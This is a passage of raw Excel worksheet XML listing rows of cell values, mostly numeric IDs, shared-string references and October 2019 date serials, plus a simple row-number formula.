        <v>18284</v>
      </c>
      <c r="B18285">
        <v>3284</v>
      </c>
      <c r="C18285" t="s">
        <v>25497</v>
      </c>
      <c r="D18285" s="1">
        <v>43748</v>
      </c>
      <c r="E18285" t="s">
        <v>29745</v>
      </c>
      <c r="F18285" t="s">
        <v>9975</v>
      </c>
      <c r="G18285" t="s">
        <v>29746</v>
      </c>
    </row>
    <row r="18286" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18286">
        <f t="shared" si="285"/>
        <v>18285</v>
      </c>
      <c r="B18286">
        <v>3285</v>
      </c>
      <c r="C18286" t="s">
        <v>25497</v>
      </c>
      <c r="D18286" s="1">
        <v>43753</v>
      </c>
      <c r="F18286" t="s">
        <v>9975</v>
      </c>
      <c r="G18286" t="s">
        <v>29747</v>
      </c>
    </row>
    <row r="18287" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18287">
        <f t="shared" si="285"/>
        <v>18286</v>
      </c>
      <c r="B18287">
        <v>3286</v>
      </c>
      <c r="C18287" t="s">
        <v>25497</v>
      </c>
      <c r="D18287" s="1">
        <v>43749</v>
      </c>
      <c r="F18287" t="s">
        <v>9978</v>
      </c>
      <c r="G18287" t="s">
        <v>29748</v>
      </c>
    </row>
    <row r="18288" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18288">
        <f t="shared" si="285"/>
        <v>18287</v>
      </c>
      <c r="B18288">
        <v>3287</v>
      </c>
      <c r="C18288" t="s">
        <v>25497</v>
      </c>
      <c r="D18288" s="1">
        <v>43753</v>
      </c>
      <c r="F18288" t="s">
        <v>9975</v>
      </c>
      <c r="G18288" t="s">
        <v>29749</v>
      </c>
    </row>
    <row r="18289" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18289">
        <f t="shared" si="285"/>
        <v>18288</v>
      </c>
      <c r="B18289">
        <v>3288</v>
      </c>
      <c r="C18289" t="s">
        <v>25497</v>
      </c>
      <c r="D18289" s="1">
        <v>43743</v>
      </c>
      <c r="E18289" t="s">
        <v>28049</v>
      </c>
      <c r="F18289" t="s">
        <v>9975</v>
      </c>
      <c r="G18289" t="s">
        <v>29750</v>
      </c>
    </row>
    <row r="18290" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18290">
        <f t="shared" si="285"/>
        <v>18289</v>
      </c>
      <c r="B18290">
        <v>3289</v>
      </c>
      <c r="C18290" t="s">
        <v>25497</v>
      </c>
      <c r="D18290" s="1">
        <v>43747</v>
      </c>
      <c r="F18290" t="s">
        <v>9975</v>
      </c>
      <c r="G18290" t="s">
        <v>29751</v>
      </c>
    </row>
    <row r="18291" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18291">
        <f t="shared" si="285"/>
        <v>18290</v>
      </c>
      <c r="B18291">
        <v>3290</v>
      </c>
      <c r="C18291" t="s">
        <v>25497</v>
      </c>
      <c r="D18291" s="1">
        <v>43739</v>
      </c>
      <c r="E18291" t="s">
        <v>27466</v>
      </c>
      <c r="F18291" t="s">
        <v>9975</v>
      </c>
      <c r="G18291" t="s">
        <v>29752</v>
      </c>
    </row>
    <row r="18292" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18292">
        <f t="shared" si="285"/>
        <v>18291</v>
      </c>
      <c r="B18292">
        <v>3291</v>
      </c>
      <c r="C18292" t="s">
        <v>25497</v>
      </c>
      <c r="D18292" s="1">
        <v>43739</v>
      </c>
      <c r="E18292" t="s">
        <v>26785</v>
      </c>
      <c r="F18292" t="s">
        <v>9975</v>
      </c>
      <c r="G18292" t="s">
        <v>29753</v>
      </c>
    </row>
    <row r="18293" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18293">
        <f t="shared" si="285"/>
        <v>18292</v>
      </c>
      <c r="B18293">
        <v>3292</v>
      </c>
      <c r="C18293" t="s">
        <v>25497</v>
      </c>
      <c r="D18293" s="1">
        <v>43753</v>
      </c>
      <c r="F18293" t="s">
        <v>10526</v>
      </c>
      <c r="G18293" t="s">
        <v>29754</v>
      </c>
    </row>
    <row r="18294" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18294">
        <f t="shared" si="285"/>
        <v>18293</v>
      </c>
      <c r="B18294">
        <v>3293</v>
      </c>
      <c r="C18294" t="s">
        <v>25497</v>
      </c>
      <c r="D18294" s="1">
        <v>43745</v>
      </c>
      <c r="F18294" t="s">
        <v>9975</v>
      </c>
      <c r="G18294" t="s">
        <v>29755</v>
      </c>
    </row>
    <row r="18295" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18295">
        <f t="shared" si="285"/>
        <v>18294</v>
      </c>
      <c r="B18295">
        <v>3294</v>
      </c>
      <c r="C18295" t="s">
        <v>25497</v>
      </c>
      <c r="D18295" s="1">
        <v>43753</v>
      </c>
      <c r="E18295" t="s">
        <v>25517</v>
      </c>
      <c r="F18295" t="s">
        <v>9975</v>
      </c>
      <c r="G18295" t="s">
        <v>29756</v>
      </c>
    </row>
    <row r="18296" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18296">
        <f t="shared" si="285"/>
        <v>18295</v>
      </c>
      <c r="B18296">
        <v>3295</v>
      </c>
      <c r="C18296" t="s">
        <v>25497</v>
      </c>
      <c r="D18296" s="1">
        <v>43740</v>
      </c>
      <c r="E18296" t="s">
        <v>29757</v>
      </c>
      <c r="F18296" t="s">
        <v>10526</v>
      </c>
      <c r="G18296" t="s">
        <v>29758</v>
      </c>
    </row>
    <row r="18297" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18297">
        <f t="shared" si="285"/>
        <v>18296</v>
      </c>
      <c r="B18297">
        <v>3296</v>
      </c>
      <c r="C18297" t="s">
        <v>25497</v>
      </c>
      <c r="D18297" s="1">
        <v>43742</v>
      </c>
      <c r="E18297" t="s">
        <v>25517</v>
      </c>
      <c r="F18297" t="s">
        <v>9975</v>
      </c>
      <c r="G18297" t="s">
        <v>29759</v>
      </c>
    </row>
    <row r="18298" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18298">
        <f t="shared" si="285"/>
        <v>18297</v>
      </c>
      <c r="B18298">
        <v>3297</v>
      </c>
      <c r="C18298" t="s">
        <v>25497</v>
      </c>
      <c r="D18298" s="1">
        <v>43752</v>
      </c>
      <c r="F18298" t="s">
        <v>9975</v>
      </c>
      <c r="G18298" t="s">
        <v>29760</v>
      </c>
    </row>
    <row r="18299" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18299">
        <f t="shared" si="285"/>
        <v>18298</v>
      </c>
      <c r="B18299">
        <v>3298</v>
      </c>
      <c r="C18299" t="s">
        <v>25497</v>
      </c>
      <c r="D18299" s="1">
        <v>43753</v>
      </c>
      <c r="E18299" t="s">
        <v>29761</v>
      </c>
      <c r="F18299" t="s">
        <v>9975</v>
      </c>
      <c r="G18299" t="s">
        <v>29762</v>
      </c>
    </row>
    <row r="18300" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18300">
        <f t="shared" si="285"/>
        <v>18299</v>
      </c>
      <c r="B18300">
        <v>3299</v>
      </c>
      <c r="C18300" t="s">
        <v>25497</v>
      </c>
      <c r="D18300" s="1">
        <v>43750</v>
      </c>
      <c r="E18300" t="s">
        <v>25774</v>
      </c>
      <c r="F18300" t="s">
        <v>9975</v>
      </c>
      <c r="G18300" t="s">
        <v>29763</v>
      </c>
    </row>
    <row r="18301" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18301">
        <f t="shared" si="285"/>
        <v>18300</v>
      </c>
      <c r="B18301">
        <v>3300</v>
      </c>
      <c r="C18301" t="s">
        <v>25497</v>
      </c>
      <c r="D18301" s="1">
        <v>43744</v>
      </c>
      <c r="E18301" t="s">
        <v>25642</v>
      </c>
      <c r="F18301" t="s">
        <v>9975</v>
      </c>
      <c r="G18301" t="s">
        <v>29764</v>
      </c>
    </row>
    <row r="18302" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18302">
        <f t="shared" si="285"/>
        <v>18301</v>
      </c>
      <c r="B18302">
        <v>3301</v>
      </c>
      <c r="C18302" t="s">
        <v>25497</v>
      </c>
      <c r="D18302" s="1">
        <v>43746</v>
      </c>
      <c r="E18302" t="s">
        <v>29765</v>
      </c>
      <c r="F18302" t="s">
        <v>9978</v>
      </c>
      <c r="G18302" t="s">
        <v>29766</v>
      </c>
    </row>
    <row r="18303" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18303">
        <f t="shared" si="285"/>
        <v>18302</v>
      </c>
      <c r="B18303">
        <v>3302</v>
      </c>
      <c r="C18303" t="s">
        <v>25497</v>
      </c>
      <c r="D18303" s="1">
        <v>43748</v>
      </c>
      <c r="E18303" t="s">
        <v>29767</v>
      </c>
      <c r="F18303" t="s">
        <v>10021</v>
      </c>
      <c r="G18303" t="s">
        <v>29768</v>
      </c>
    </row>
    <row r="18304" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18304">
        <f t="shared" si="285"/>
        <v>18303</v>
      </c>
      <c r="B18304">
        <v>3303</v>
      </c>
      <c r="C18304" t="s">
        <v>25497</v>
      </c>
      <c r="D18304" s="1">
        <v>43739</v>
      </c>
      <c r="E18304" t="s">
        <v>29769</v>
      </c>
      <c r="F18304" t="s">
        <v>9975</v>
      </c>
      <c r="G18304" t="s">
        <v>29770</v>
      </c>
    </row>
    <row r="18305" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18305">
        <f t="shared" si="285"/>
        <v>18304</v>
      </c>
      <c r="B18305">
        <v>3304</v>
      </c>
      <c r="C18305" t="s">
        <v>25497</v>
      </c>
      <c r="D18305" s="1">
        <v>43752</v>
      </c>
      <c r="E18305" t="s">
        <v>29771</v>
      </c>
      <c r="F18305" t="s">
        <v>10021</v>
      </c>
      <c r="G18305" t="s">
        <v>29772</v>
      </c>
    </row>
    <row r="18306" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18306">
        <f t="shared" si="285"/>
        <v>18305</v>
      </c>
      <c r="B18306">
        <v>3305</v>
      </c>
      <c r="C18306" t="s">
        <v>25497</v>
      </c>
      <c r="D18306" s="1">
        <v>43744</v>
      </c>
      <c r="F18306" t="s">
        <v>9975</v>
      </c>
      <c r="G18306" t="s">
        <v>29773</v>
      </c>
    </row>
    <row r="18307" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18307">
        <f t="shared" ref="A18307:A18370" si="286">+ROW(A18306)</f>
        <v>18306</v>
      </c>
      <c r="B18307">
        <v>3306</v>
      </c>
      <c r="C18307" t="s">
        <v>25497</v>
      </c>
      <c r="D18307" s="1">
        <v>43754</v>
      </c>
      <c r="F18307" t="s">
        <v>9975</v>
      </c>
      <c r="G18307" t="s">
        <v>29774</v>
      </c>
    </row>
    <row r="18308" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18308">
        <f t="shared" si="286"/>
        <v>18307</v>
      </c>
      <c r="B18308">
        <v>3307</v>
      </c>
      <c r="C18308" t="s">
        <v>25497</v>
      </c>
      <c r="D18308" s="1">
        <v>43747</v>
      </c>
      <c r="F18308" t="s">
        <v>9975</v>
      </c>
      <c r="G18308" t="s">
        <v>29775</v>
      </c>
    </row>
    <row r="18309" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18309">
        <f t="shared" si="286"/>
        <v>18308</v>
      </c>
      <c r="B18309">
        <v>3308</v>
      </c>
      <c r="C18309" t="s">
        <v>25497</v>
      </c>
      <c r="D18309" s="1">
        <v>43742</v>
      </c>
      <c r="E18309" t="s">
        <v>25543</v>
      </c>
      <c r="F18309" t="s">
        <v>9975</v>
      </c>
      <c r="G18309" t="s">
        <v>29776</v>
      </c>
    </row>
    <row r="18310" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18310">
        <f t="shared" si="286"/>
        <v>18309</v>
      </c>
      <c r="B18310">
        <v>3309</v>
      </c>
      <c r="C18310" t="s">
        <v>25497</v>
      </c>
      <c r="D18310" s="1">
        <v>43753</v>
      </c>
      <c r="E18310" t="s">
        <v>29777</v>
      </c>
      <c r="F18310" t="s">
        <v>10021</v>
      </c>
      <c r="G18310" t="s">
        <v>29778</v>
      </c>
    </row>
    <row r="18311" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18311">
        <f t="shared" si="286"/>
        <v>18310</v>
      </c>
      <c r="B18311">
        <v>3310</v>
      </c>
      <c r="C18311" t="s">
        <v>25497</v>
      </c>
      <c r="D18311" s="1">
        <v>43745</v>
      </c>
      <c r="E18311" t="s">
        <v>25512</v>
      </c>
      <c r="F18311" t="s">
        <v>9975</v>
      </c>
      <c r="G18311" t="s">
        <v>29779</v>
      </c>
    </row>
    <row r="18312" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18312">
        <f t="shared" si="286"/>
        <v>18311</v>
      </c>
      <c r="B18312">
        <v>3311</v>
      </c>
      <c r="C18312" t="s">
        <v>25497</v>
      </c>
      <c r="D18312" s="1">
        <v>43745</v>
      </c>
      <c r="E18312" t="s">
        <v>25592</v>
      </c>
      <c r="F18312" t="s">
        <v>9975</v>
      </c>
      <c r="G18312" t="s">
        <v>29780</v>
      </c>
    </row>
    <row r="18313" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18313">
        <f t="shared" si="286"/>
        <v>18312</v>
      </c>
      <c r="B18313">
        <v>3312</v>
      </c>
      <c r="C18313" t="s">
        <v>25497</v>
      </c>
      <c r="D18313" s="1">
        <v>43750</v>
      </c>
      <c r="F18313" t="s">
        <v>9975</v>
      </c>
      <c r="G18313" t="s">
        <v>29781</v>
      </c>
    </row>
    <row r="18314" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18314">
        <f t="shared" si="286"/>
        <v>18313</v>
      </c>
      <c r="B18314">
        <v>3313</v>
      </c>
      <c r="C18314" t="s">
        <v>25497</v>
      </c>
      <c r="D18314" s="1">
        <v>43754</v>
      </c>
      <c r="E18314" t="s">
        <v>25517</v>
      </c>
      <c r="F18314" t="s">
        <v>9975</v>
      </c>
      <c r="G18314" t="s">
        <v>29782</v>
      </c>
    </row>
    <row r="18315" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18315">
        <f t="shared" si="286"/>
        <v>18314</v>
      </c>
      <c r="B18315">
        <v>3314</v>
      </c>
      <c r="C18315" t="s">
        <v>25497</v>
      </c>
      <c r="D18315" s="1">
        <v>43754</v>
      </c>
      <c r="E18315" t="s">
        <v>25609</v>
      </c>
      <c r="F18315" t="s">
        <v>9975</v>
      </c>
      <c r="G18315" t="s">
        <v>29783</v>
      </c>
    </row>
    <row r="18316" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18316">
        <f t="shared" si="286"/>
        <v>18315</v>
      </c>
      <c r="B18316">
        <v>3315</v>
      </c>
      <c r="C18316" t="s">
        <v>25497</v>
      </c>
      <c r="D18316" s="1">
        <v>43745</v>
      </c>
      <c r="E18316" t="s">
        <v>25504</v>
      </c>
      <c r="F18316" t="s">
        <v>9975</v>
      </c>
      <c r="G18316" t="s">
        <v>29784</v>
      </c>
    </row>
    <row r="18317" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18317">
        <f t="shared" si="286"/>
        <v>18316</v>
      </c>
      <c r="B18317">
        <v>3316</v>
      </c>
      <c r="C18317" t="s">
        <v>25497</v>
      </c>
      <c r="D18317" s="1">
        <v>43755</v>
      </c>
      <c r="E18317" t="s">
        <v>26805</v>
      </c>
      <c r="F18317" t="s">
        <v>9975</v>
      </c>
      <c r="G18317" t="s">
        <v>29785</v>
      </c>
    </row>
    <row r="18318" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18318">
        <f t="shared" si="286"/>
        <v>18317</v>
      </c>
      <c r="B18318">
        <v>3317</v>
      </c>
      <c r="C18318" t="s">
        <v>25497</v>
      </c>
      <c r="D18318" s="1">
        <v>43748</v>
      </c>
      <c r="E18318" t="s">
        <v>29786</v>
      </c>
      <c r="F18318" t="s">
        <v>9975</v>
      </c>
      <c r="G18318" t="s">
        <v>29787</v>
      </c>
    </row>
    <row r="18319" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18319">
        <f t="shared" si="286"/>
        <v>18318</v>
      </c>
      <c r="B18319">
        <v>3318</v>
      </c>
      <c r="C18319" t="s">
        <v>25497</v>
      </c>
      <c r="D18319" s="1">
        <v>43741</v>
      </c>
      <c r="E18319" t="s">
        <v>25512</v>
      </c>
      <c r="F18319" t="s">
        <v>9975</v>
      </c>
      <c r="G18319" t="s">
        <v>29788</v>
      </c>
    </row>
    <row r="18320" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18320">
        <f t="shared" si="286"/>
        <v>18319</v>
      </c>
      <c r="B18320">
        <v>3319</v>
      </c>
      <c r="C18320" t="s">
        <v>25497</v>
      </c>
      <c r="D18320" s="1">
        <v>43746</v>
      </c>
      <c r="E18320" t="s">
        <v>26195</v>
      </c>
      <c r="F18320" t="s">
        <v>9975</v>
      </c>
      <c r="G18320" t="s">
        <v>29789</v>
      </c>
    </row>
    <row r="18321" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18321">
        <f t="shared" si="286"/>
        <v>18320</v>
      </c>
      <c r="B18321">
        <v>3320</v>
      </c>
      <c r="C18321" t="s">
        <v>25497</v>
      </c>
      <c r="D18321" s="1">
        <v>43748</v>
      </c>
      <c r="E18321" t="s">
        <v>25504</v>
      </c>
      <c r="F18321" t="s">
        <v>9975</v>
      </c>
      <c r="G18321" t="s">
        <v>29790</v>
      </c>
    </row>
    <row r="18322" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18322">
        <f t="shared" si="286"/>
        <v>18321</v>
      </c>
      <c r="B18322">
        <v>3321</v>
      </c>
      <c r="C18322" t="s">
        <v>25497</v>
      </c>
      <c r="D18322" s="1">
        <v>43740</v>
      </c>
      <c r="F18322" t="s">
        <v>9975</v>
      </c>
      <c r="G18322" t="s">
        <v>29791</v>
      </c>
    </row>
    <row r="18323" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18323">
        <f t="shared" si="286"/>
        <v>18322</v>
      </c>
      <c r="B18323">
        <v>3322</v>
      </c>
      <c r="C18323" t="s">
        <v>25497</v>
      </c>
      <c r="D18323" s="1">
        <v>43752</v>
      </c>
      <c r="E18323" t="s">
        <v>28002</v>
      </c>
      <c r="F18323" t="s">
        <v>9975</v>
      </c>
      <c r="G18323" t="s">
        <v>29792</v>
      </c>
    </row>
    <row r="18324" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18324">
        <f t="shared" si="286"/>
        <v>18323</v>
      </c>
      <c r="B18324">
        <v>3323</v>
      </c>
      <c r="C18324" t="s">
        <v>25497</v>
      </c>
      <c r="D18324" s="1">
        <v>43743</v>
      </c>
      <c r="F18324" t="s">
        <v>9975</v>
      </c>
      <c r="G18324" t="s">
        <v>29793</v>
      </c>
    </row>
    <row r="18325" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18325">
        <f t="shared" si="286"/>
        <v>18324</v>
      </c>
      <c r="B18325">
        <v>3324</v>
      </c>
      <c r="C18325" t="s">
        <v>25497</v>
      </c>
      <c r="D18325" s="1">
        <v>43755</v>
      </c>
      <c r="E18325" t="s">
        <v>25502</v>
      </c>
      <c r="F18325" t="s">
        <v>9975</v>
      </c>
      <c r="G18325" t="s">
        <v>29794</v>
      </c>
    </row>
    <row r="18326" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18326">
        <f t="shared" si="286"/>
        <v>18325</v>
      </c>
      <c r="B18326">
        <v>3325</v>
      </c>
      <c r="C18326" t="s">
        <v>25497</v>
      </c>
      <c r="D18326" s="1">
        <v>43749</v>
      </c>
      <c r="E18326" t="s">
        <v>29061</v>
      </c>
      <c r="F18326" t="s">
        <v>9975</v>
      </c>
      <c r="G18326" t="s">
        <v>29795</v>
      </c>
    </row>
    <row r="18327" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18327">
        <f t="shared" si="286"/>
        <v>18326</v>
      </c>
      <c r="B18327">
        <v>3326</v>
      </c>
      <c r="C18327" t="s">
        <v>25497</v>
      </c>
      <c r="D18327" s="1">
        <v>43746</v>
      </c>
      <c r="F18327" t="s">
        <v>9975</v>
      </c>
      <c r="G18327" t="s">
        <v>29796</v>
      </c>
    </row>
    <row r="18328" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18328">
        <f t="shared" si="286"/>
        <v>18327</v>
      </c>
      <c r="B18328">
        <v>3327</v>
      </c>
      <c r="C18328" t="s">
        <v>25497</v>
      </c>
      <c r="D18328" s="1">
        <v>43748</v>
      </c>
      <c r="E18328" t="s">
        <v>25723</v>
      </c>
      <c r="F18328" t="s">
        <v>9975</v>
      </c>
      <c r="G18328" t="s">
        <v>25724</v>
      </c>
    </row>
    <row r="18329" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18329">
        <f t="shared" si="286"/>
        <v>18328</v>
      </c>
      <c r="B18329">
        <v>3328</v>
      </c>
      <c r="C18329" t="s">
        <v>25497</v>
      </c>
      <c r="D18329" s="1">
        <v>43748</v>
      </c>
      <c r="E18329" t="s">
        <v>29797</v>
      </c>
      <c r="F18329" t="s">
        <v>9975</v>
      </c>
      <c r="G18329" t="s">
        <v>29798</v>
      </c>
    </row>
    <row r="18330" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18330">
        <f t="shared" si="286"/>
        <v>18329</v>
      </c>
      <c r="B18330">
        <v>3329</v>
      </c>
      <c r="C18330" t="s">
        <v>25497</v>
      </c>
      <c r="D18330" s="1">
        <v>43746</v>
      </c>
      <c r="E18330" t="s">
        <v>25512</v>
      </c>
      <c r="F18330" t="s">
        <v>9975</v>
      </c>
      <c r="G18330" t="s">
        <v>29799</v>
      </c>
    </row>
    <row r="18331" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18331">
        <f t="shared" si="286"/>
        <v>18330</v>
      </c>
      <c r="B18331">
        <v>3330</v>
      </c>
      <c r="C18331" t="s">
        <v>25497</v>
      </c>
      <c r="D18331" s="1">
        <v>43752</v>
      </c>
      <c r="E18331" t="s">
        <v>29800</v>
      </c>
      <c r="F18331" t="s">
        <v>9975</v>
      </c>
      <c r="G18331" t="s">
        <v>29801</v>
      </c>
    </row>
    <row r="18332" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18332">
        <f t="shared" si="286"/>
        <v>18331</v>
      </c>
      <c r="B18332">
        <v>3331</v>
      </c>
      <c r="C18332" t="s">
        <v>25497</v>
      </c>
      <c r="D18332" s="1">
        <v>43754</v>
      </c>
      <c r="E18332" t="s">
        <v>29802</v>
      </c>
      <c r="F18332" t="s">
        <v>9975</v>
      </c>
      <c r="G18332" t="s">
        <v>29803</v>
      </c>
    </row>
    <row r="18333" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18333">
        <f t="shared" si="286"/>
        <v>18332</v>
      </c>
      <c r="B18333">
        <v>3332</v>
      </c>
      <c r="C18333" t="s">
        <v>25497</v>
      </c>
      <c r="D18333" s="1">
        <v>43756</v>
      </c>
      <c r="E18333" t="s">
        <v>29804</v>
      </c>
      <c r="F18333" t="s">
        <v>9975</v>
      </c>
      <c r="G18333" t="s">
        <v>29805</v>
      </c>
    </row>
    <row r="18334" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18334">
        <f t="shared" si="286"/>
        <v>18333</v>
      </c>
      <c r="B18334">
        <v>3333</v>
      </c>
      <c r="C18334" t="s">
        <v>25497</v>
      </c>
      <c r="D18334" s="1">
        <v>43747</v>
      </c>
      <c r="E18334" t="s">
        <v>25592</v>
      </c>
      <c r="F18334" t="s">
        <v>9975</v>
      </c>
      <c r="G18334" t="s">
        <v>29806</v>
      </c>
    </row>
    <row r="18335" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18335">
        <f t="shared" si="286"/>
        <v>18334</v>
      </c>
      <c r="B18335">
        <v>3334</v>
      </c>
      <c r="C18335" t="s">
        <v>25497</v>
      </c>
      <c r="D18335" s="1">
        <v>43755</v>
      </c>
      <c r="E18335" t="s">
        <v>25609</v>
      </c>
      <c r="F18335" t="s">
        <v>9975</v>
      </c>
      <c r="G18335" t="s">
        <v>29807</v>
      </c>
    </row>
    <row r="18336" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18336">
        <f t="shared" si="286"/>
        <v>18335</v>
      </c>
      <c r="B18336">
        <v>3335</v>
      </c>
      <c r="C18336" t="s">
        <v>25497</v>
      </c>
      <c r="D18336" s="1">
        <v>43746</v>
      </c>
      <c r="F18336" t="s">
        <v>9975</v>
      </c>
      <c r="G18336" t="s">
        <v>29808</v>
      </c>
    </row>
    <row r="18337" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18337">
        <f t="shared" si="286"/>
        <v>18336</v>
      </c>
      <c r="B18337">
        <v>3336</v>
      </c>
      <c r="C18337" t="s">
        <v>25497</v>
      </c>
      <c r="D18337" s="1">
        <v>43751</v>
      </c>
      <c r="E18337" t="s">
        <v>29809</v>
      </c>
      <c r="F18337" t="s">
        <v>10021</v>
      </c>
      <c r="G18337" t="s">
        <v>29810</v>
      </c>
    </row>
    <row r="18338" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18338">
        <f t="shared" si="286"/>
        <v>18337</v>
      </c>
      <c r="B18338">
        <v>3337</v>
      </c>
      <c r="C18338" t="s">
        <v>25497</v>
      </c>
      <c r="D18338" s="1">
        <v>43748</v>
      </c>
      <c r="F18338" t="s">
        <v>9975</v>
      </c>
      <c r="G18338" t="s">
        <v>29811</v>
      </c>
    </row>
    <row r="18339" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18339">
        <f t="shared" si="286"/>
        <v>18338</v>
      </c>
      <c r="B18339">
        <v>3338</v>
      </c>
      <c r="C18339" t="s">
        <v>25497</v>
      </c>
      <c r="D18339" s="1">
        <v>43742</v>
      </c>
      <c r="E18339" t="s">
        <v>29812</v>
      </c>
      <c r="F18339" t="s">
        <v>10526</v>
      </c>
      <c r="G18339" t="s">
        <v>29813</v>
      </c>
    </row>
    <row r="18340" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18340">
        <f t="shared" si="286"/>
        <v>18339</v>
      </c>
      <c r="B18340">
        <v>3339</v>
      </c>
      <c r="C18340" t="s">
        <v>25497</v>
      </c>
      <c r="D18340" s="1">
        <v>43740</v>
      </c>
      <c r="E18340" t="s">
        <v>29814</v>
      </c>
      <c r="F18340" t="s">
        <v>9975</v>
      </c>
      <c r="G18340" t="s">
        <v>29815</v>
      </c>
    </row>
    <row r="18341" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18341">
        <f t="shared" si="286"/>
        <v>18340</v>
      </c>
      <c r="B18341">
        <v>3340</v>
      </c>
      <c r="C18341" t="s">
        <v>25497</v>
      </c>
      <c r="D18341" s="1">
        <v>43747</v>
      </c>
      <c r="E18341" t="s">
        <v>29816</v>
      </c>
      <c r="F18341" t="s">
        <v>9975</v>
      </c>
      <c r="G18341" t="s">
        <v>29817</v>
      </c>
    </row>
    <row r="18342" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18342">
        <f t="shared" si="286"/>
        <v>18341</v>
      </c>
      <c r="B18342">
        <v>3341</v>
      </c>
      <c r="C18342" t="s">
        <v>25497</v>
      </c>
      <c r="D18342" s="1">
        <v>43739</v>
      </c>
      <c r="E18342" t="s">
        <v>29818</v>
      </c>
      <c r="F18342" t="s">
        <v>9975</v>
      </c>
      <c r="G18342" t="s">
        <v>29819</v>
      </c>
    </row>
    <row r="18343" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18343">
        <f t="shared" si="286"/>
        <v>18342</v>
      </c>
      <c r="B18343">
        <v>3342</v>
      </c>
      <c r="C18343" t="s">
        <v>25497</v>
      </c>
      <c r="D18343" s="1">
        <v>43753</v>
      </c>
      <c r="F18343" t="s">
        <v>9975</v>
      </c>
      <c r="G18343" t="s">
        <v>29820</v>
      </c>
    </row>
    <row r="18344" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18344">
        <f t="shared" si="286"/>
        <v>18343</v>
      </c>
      <c r="B18344">
        <v>3343</v>
      </c>
      <c r="C18344" t="s">
        <v>25497</v>
      </c>
      <c r="D18344" s="1">
        <v>43748</v>
      </c>
      <c r="E18344" t="s">
        <v>27521</v>
      </c>
      <c r="F18344" t="s">
        <v>9975</v>
      </c>
      <c r="G18344" t="s">
        <v>27522</v>
      </c>
    </row>
    <row r="18345" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18345">
        <f t="shared" si="286"/>
        <v>18344</v>
      </c>
      <c r="B18345">
        <v>3344</v>
      </c>
      <c r="C18345" t="s">
        <v>25497</v>
      </c>
      <c r="D18345" s="1">
        <v>43742</v>
      </c>
      <c r="E18345" t="s">
        <v>29821</v>
      </c>
      <c r="F18345" t="s">
        <v>9975</v>
      </c>
      <c r="G18345" t="s">
        <v>29822</v>
      </c>
    </row>
    <row r="18346" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18346">
        <f t="shared" si="286"/>
        <v>18345</v>
      </c>
      <c r="B18346">
        <v>3345</v>
      </c>
      <c r="C18346" t="s">
        <v>25497</v>
      </c>
      <c r="D18346" s="1">
        <v>43757</v>
      </c>
      <c r="F18346" t="s">
        <v>9975</v>
      </c>
      <c r="G18346" t="s">
        <v>29823</v>
      </c>
    </row>
    <row r="18347" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18347">
        <f t="shared" si="286"/>
        <v>18346</v>
      </c>
      <c r="B18347">
        <v>3346</v>
      </c>
      <c r="C18347" t="s">
        <v>25497</v>
      </c>
      <c r="D18347" s="1">
        <v>43749</v>
      </c>
      <c r="E18347" t="s">
        <v>25592</v>
      </c>
      <c r="F18347" t="s">
        <v>9975</v>
      </c>
      <c r="G18347" t="s">
        <v>29824</v>
      </c>
    </row>
    <row r="18348" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18348">
        <f t="shared" si="286"/>
